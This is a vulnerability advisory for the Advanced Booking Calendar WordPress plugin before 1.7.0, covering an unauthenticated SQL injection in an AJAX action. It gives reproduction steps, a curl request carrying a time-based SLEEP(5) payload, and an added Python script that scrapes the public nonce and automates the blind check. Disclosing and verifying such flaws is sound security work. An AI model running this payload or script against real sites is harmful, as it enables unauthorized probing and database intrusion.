Advanced Booking Calendar < 1.7.0 - Unauthenticated SQL Injection

wpexploit | cydave | WPEX-ID:990D1B0A-DBD1-42D0-9A40-C345407C6FE0
Published: Feb 28, 2022, 00:00

EPSS: 0.002 (percentile 52.0%)

The plugin does not validate or escape the calendar parameter before using it in a SQL statement in the abc_booking_getSingleCalendar AJAX action (registered for both unauthenticated and authenticated users), leading to an unauthenticated SQL injection. The proof of concept below confirms it blindly through a time delay: the injected subquery calls SLEEP(5), so a vulnerable site answers about five seconds later than it does for a benign calendar value.

1. Install the vulnerable plugin (advanced-booking-calendar version 1.6.9)
2. Create a new calendar (the specific configuration shouldn't matter - we just need the shortcode)
3. Create a new page with the shortcode you receive when you finish creating a calendar
4. Visit the just created page and extract the nonce (search for abc_nonce in the source)
5. Invoke the following command to induce a 5-second delay in the response (the nonce and uniqid values shown are examples; substitute the ones from your install)

curl -i http://example.com/wp-admin/admin-ajax.php --data 'action=abc_booking_getSingleCalendar&abc_nonce=7d55255d19&uniqid=620ff6dacd7f8&month=3&calendar=(SELECT 4061 FROM (SELECT(SLEEP(5)))GjRo)'

Note:
+ "abc_nonce" is the required nonce extracted from the page source in step 4 (it is tied to the visitor, not to a login, so no account is needed)
+ "uniqid" can be any string
+ "month" must be supplied and must be an integer between 1 and 12
+ "calendar" is the injection point; the request above works only because the value is concatenated into the query unescaped
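The five steps and the notes above describe a manual check. The script below automates it end to end: pull the nonce out of the rendered page, build the admin-ajax.php request, and compare the response time of a benign calendar value against the SLEEP(5) payload. It is an added example written for this page, not code from cydave, WPScan or the plugin; the inline page snippet is constructed, the nonce regex is an assumption about how the shortcode embeds abc_nonce (adjust it to the markup you actually see), and the 4-second threshold is a judgement call for a lab network.

```python
#!/usr/bin/env python3
"""Time-based blind check for the Advanced Booking Calendar < 1.7.0 SQLi.

Added example for this advisory page (not the original PoC author's code).
Assumes a lab install of advanced-booking-calendar 1.6.9 reachable at BASE_URL
with a page that renders the calendar shortcode at CALENDAR_PAGE.
"""
import re
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional

BASE_URL = "http://example.com"          # assumption: lab target
CALENDAR_PAGE = BASE_URL + "/calendar/"  # assumption: page holding the shortcode
AJAX_URL = BASE_URL + "/wp-admin/admin-ajax.php"
DELAY = 5          # seconds the payload asks MySQL to sleep
THRESHOLD = 4.0    # extra seconds over baseline that count as a hit

# Constructed sample of the page source; the real page embeds abc_nonce in
# inline JavaScript, and the exact quoting may differ from this.
SAMPLE_PAGE = (
    '<script>var abc_ajax = {"url":"/wp-admin/admin-ajax.php",'
    '"abc_nonce":"7d55255d19"};</script>'
)

# WordPress nonces are 10 lowercase hex characters (substr of wp_hash()).
NONCE_RE = re.compile(r'abc_nonce["\']?\s*[:=]\s*["\']([0-9a-f]{10})["\']')


def extract_nonce(html: str) -> Optional[str]:
    """Return the abc_nonce value from a rendered calendar page, or None."""
    match = NONCE_RE.search(html)
    return match.group(1) if match else None


def sleep_payload(seconds: int, marker: int = 4061) -> str:
    """Same construct as the advisory's curl PoC: a derived table forces
    SLEEP() to be evaluated even though the outer SELECT returns a constant."""
    return f"(SELECT {marker} FROM (SELECT(SLEEP({seconds})))GjRo)"


def build_body(nonce: str, calendar: str, month: int = 3,
               uniqid: str = "620ff6dacd7f8") -> bytes:
    """Form-encode the abc_booking_getSingleCalendar request."""
    if not 1 <= month <= 12:
        raise ValueError("month must be a valid month number")
    return urllib.parse.urlencode({
        "action": "abc_booking_getSingleCalendar",
        "abc_nonce": nonce,
        "uniqid": uniqid,
        "month": month,
        "calendar": calendar,
    }).encode()


def timed_post(url: str, body: bytes) -> float:
    """POST the body and return the round-trip time in seconds. A 4xx from
    admin-ajax.php (e.g. a rejected nonce) is still timed so the caller can
    see that nothing slept."""
    req = urllib.request.Request(
        url, data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=DELAY * 4) as resp:
            resp.read()
    except urllib.error.HTTPError as err:
        err.read()
    return time.monotonic() - start


def is_injectable(ajax_url: str, nonce: str) -> bool:
    """Compare a benign value against the SLEEP payload; a difference close
    to DELAY means the calendar parameter reached the query unescaped."""
    baseline = timed_post(ajax_url, build_body(nonce, "1"))
    delayed = timed_post(ajax_url, build_body(nonce, sleep_payload(DELAY)))
    return delayed - baseline >= THRESHOLD


if __name__ == "__main__":
    with urllib.request.urlopen(CALENDAR_PAGE, timeout=20) as page:
        nonce = extract_nonce(page.read().decode("utf-8", "replace"))
    if nonce is None:
        sys.exit("abc_nonce not found; is the shortcode page correct?")
    print("vulnerable" if is_injectable(AJAX_URL, nonce) else "no delay observed")
```

Run it twice if the first result is borderline: a slow shared host can add seconds of jitter, which is why the script measures a baseline request rather than comparing against a fixed clock. Extracting the nonce from the public page is the step that makes this unauthenticated; the nonce only proves the request came from a page the site served, not that the sender is logged in.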
